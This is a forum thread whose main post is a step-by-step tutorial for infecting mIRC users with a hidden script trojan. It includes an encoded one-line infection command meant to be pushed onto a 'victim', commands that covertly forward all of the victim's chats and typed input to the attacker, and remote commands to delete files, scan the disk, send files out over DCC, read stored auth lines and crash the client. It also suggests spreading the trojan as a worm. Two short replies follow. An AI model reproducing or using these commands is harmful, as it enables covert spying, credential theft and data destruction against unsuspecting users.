xymon
+ Reply to Thread
Results 1 to 4 of 4

Thread: How to create your own irc trojan to spy on your victim.

  1. #1
    carlo Guest

    How to create your own irc trojan to spy on your victim.

    First of all you must have C++. You can get a free version from [URL=http://www.bloodshed.net/dev/devcpp.html]here[/URL]

    Now we can start.

    With the use of script you will be able to have remote control on the victim's PC being able to do everything you want. This tutorial is written for all people, don't need to understand IRC script, it's easy to understand and easy to use. No real pre-knowledge required. Of course this is for educational use only, to see how remote control on IRC works. The author of this is of course not responsible for the damage you may cause using this script. You can edit this code into a worm that spreads the trojan using a bot (written in Visual Basic or C by example). Also look at the mIRC Worm by M.A.B.

    --------------------------------------------------------------------------------

    Tutorial mIRC Trojan

    Infect the victim

    The Trojan can be activated by the victim when he writes the next command:

    //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAu***r***yLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK i love you

    YOURNICK = your nick. The victim will message you “I love you” once he writes the command. You can edit it or just delete the “ | msg YOURNICK I love you ” part.

    This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }

    The haltdef will block your messages to the victim beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC.

    Example:

    /msg victim ins msg #channel hi

    This will let the victim message #channel the “hi” message, but the victim will NOT see it, all others in the channel will see. And the victim will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it?

    When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:

    Spy the victim

    /msg victim ins write -c myscript.mrc
    /msg victim ins unload -rs myscript.mrc
    /msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
    /msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $*- }
    /msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($*,*) != /,< $+ $me $+ >,[COMMAND]) $*- }
    /msg victim ins load -rs myscript.mrc

    Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:

    /msg victim ins unload -rs myscript.mrc

    Note: victim = the nick of the victim who has executed that command, and who has the Trojan.

    Sometimes you want to partly spy the victim, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:

    /msg victim ins write -c myscript.mrc
    /msg victim ins unload -rs myscript.mrc
    /msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
    /msg victim ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $*- }
    /msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($*,*) != /,< $+ $me $+ >,[COMMAND]) $*- }
    /msg victim ins load -rs myscript.mrc

    YOURNICK is your nick, and victim is the nick of the victim.

    Make other remote files (.mrc)

    You can make remote files yourself and add usefull functions in it.

    /msg victim insert write -c YOURSCRIPTNAME.mrc on *:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
    /msg victim ins .load –rs YOURSCRIPTNAMEt.mrc

    Use of the Trojan

    REMOVE FILE :
    /msg victim ins remove C:\Textfile.txt

    OPEN SITE:
    /msg victim ins url [url]www.site.com[/url]

    JOIN CHANNEL:
    /msg victim ins join #channel

    PART CHANNEL:
    /msg victim ins part #channel

    QUERY USER:
    /msg victim ins query user

    MSG USER:
    /msg victim ins msg user

    INVITE USER:
    /msg victim ins invite user #channel

    BAN USER:
    /msg victim ins ban #channel user

    KICK USER:
    /msg victim ins kick #channel user

    IGNORE USER:
    /msg victim ins ignore *!*@host.com

    UNIGNORE USER:
    /msg victim ins unignore *!*@host.com

    CHANGE NICK:
    /msg victim ins nick thenickyouwant

    OP USER:
    /msg victim ins mode #channel +o user

    VOICE USER:
    /msg victim ins mode #channel +v user

    CHANGE TOPIC:
    /msg victim ins topic #channel text

    RECEIVE FILE:
    /msg victim ins dcc send user file
    or
    /msg victim ins dcc send user C:\something.sth

    EDIT TEXT:
    /msg victim ins write -l* C:\TESTING.txt thetextyouwanttoedit
    (-l* --> first line)

    READ A PIECE OF FILE (LIKE PERFORM):
    following commands must be executed after eachother:
    /msg victim ins write mab alias abcd*2* { msg user $read(perform.ini,w,*auth*) }
    /msg victim ins .load -rs mab
    /msg victim ins abcd*2*

    SEARCH HARD DISK FOR A FILE:
    /msg victim ins write MAB* alias MAB* { .echo $findfile(C:\,porn.*,0,msg user $*-) }
    /msg victim ins .load -rs MAB*
    /msg victim ins MAB*

    LET HIS mIRC CRASH:
    /msg victim ins write MAB2 alias MAB2 { while (* != 2) { beep } }
    /msg victim ins .load -rs MAB2
    /msg victim ins MAB2

    SCAN HIS HARD DISK AND SAVE IT AS .txt:
    //echo $findfile(c:,*.*,0,write C:\M_A_B.txt $*-)

    Note: Probably you want this file, well you do this:

    /msg victim ins dcc send YOURNICK C:\M_A_B.txt

    ** Important note **

    The victim will see the send dialog, so act quick, for security reasons i s***est to write another trojan on another file; like:

    /msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAu***r***yLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc

    TURN THE AUTO JOIN ON INVITE ON (or OFF)
    /msg victim ins ajinvite on

    LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
    /msg victim ins amsg <the message you want him to say on all channels>

    CHANGE THE VICTIMs ALTERNATIVE NICK:
    /msg victim ins anick <nickname>

    CHANGE THE VICTIMs BACKGROUND PICTURE:
    /msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
    with
    -a = active window
    -m = main mIRC window
    -s = status window
    -g = finger window
    -d = single message window
    -e = set as default
    -cfnrtp = center, fill, normal, stretch, tile, photo
    -l = toolbar
    -u = toolbar buttons
    -h = switchbar
    -x = no background picture

    LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
    /msg victim ins channel #CHANNELNAME

    Note: the victim must be on #CHANNELNAME

    CLEAR YOUR *****S BY CLEARING THE TEXT ON THE OPEN WINDOWS:
    /msg victim ins clearall [-snqmtgu]
    s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.

    LET THE VICTIM CLIP***RD A SPECIFIED TEXT:
    /msg victim ins clip***rd <the text you want to be clip***rded>

    CLOSE THE OPEN QUERIES OF THE VICTIM:
    /msg victim ins close

    LET THE VICTIM QUIT mIRC:
    /msg victim ins quit <the quit message you want>

    LET THE VICTIM DISCONNECT FROM SERVER:
    /msg victim ins disconnect

    LET THE VICTIM CHANGE SERVER:
    /msg victim ins server the.server.you.want

    LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
    /msg victim ins server -m
    /msg victim ins server the.server.you.want

    LET THE VICTIM GIVE YOU FLAGS (if he is able to):
    /msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
    Note:
    |TheBot| = the bot who can give flags
    Chanlev = can be different, sometimes it is also, "adduser"
    flag = the flag you want
    YOURNICK = your nick

    CHANGE THE VICTIMs FONT AND FONT SIZE:
    /msg victim ins font -asgbd <fontsize> <fontname>

    CHANGE THE VICTIMs FULL NAME:
    /msg victim ins fullname <name>

    LET THE VICTIM REJOIN A CHANNEL:
    /msg victim ins hop #CHANNEL

    MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
    /msg victim ins mkdir <dirname>
    NOTE:
    victim = nick of the victim
    user = your nick

    Carlo

  2. #2
    Join Date
    Nov 2005
    Posts
    1

    anti spy script for irc?

    I was wondering if there's also one script that can detected if someone is spaying you on dalnet.. if so.. can you tell me? thanks.

  3. #3
    Join Date
    Nov 2005
    Posts
    8
    is the IRCbot.worm associated with this?

  4. #4
    carlo Guest

    No

    No

    It is not a worm.

+ Reply to Thread

Similar Threads

  1. how to create a detectable trojan undetectable?
    By humza in forum Viruses and Trojans
    Replies: 26
    Last Post: 07-26-2009, 06:10 AM
  2. Create Your First BOT
    By SyntaXmasteR in forum Tutorials
    Replies: 22
    Last Post: 04-20-2008, 06:11 PM
  3. How create polls?
    By idnedhelper in forum General discussion
    Replies: 2
    Last Post: 11-13-2007, 10:58 AM
  4. i'm a common victim of hackers
    By staci in forum Internet Privacy
    Replies: 1
    Last Post: 07-30-2005, 10:38 PM
  5. Dmitry Sklyarov. Corporate world domination victim?
    By Intrepid in forum Security & Encryption
    Replies: 0
    Last Post: 07-19-2001, 11:16 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts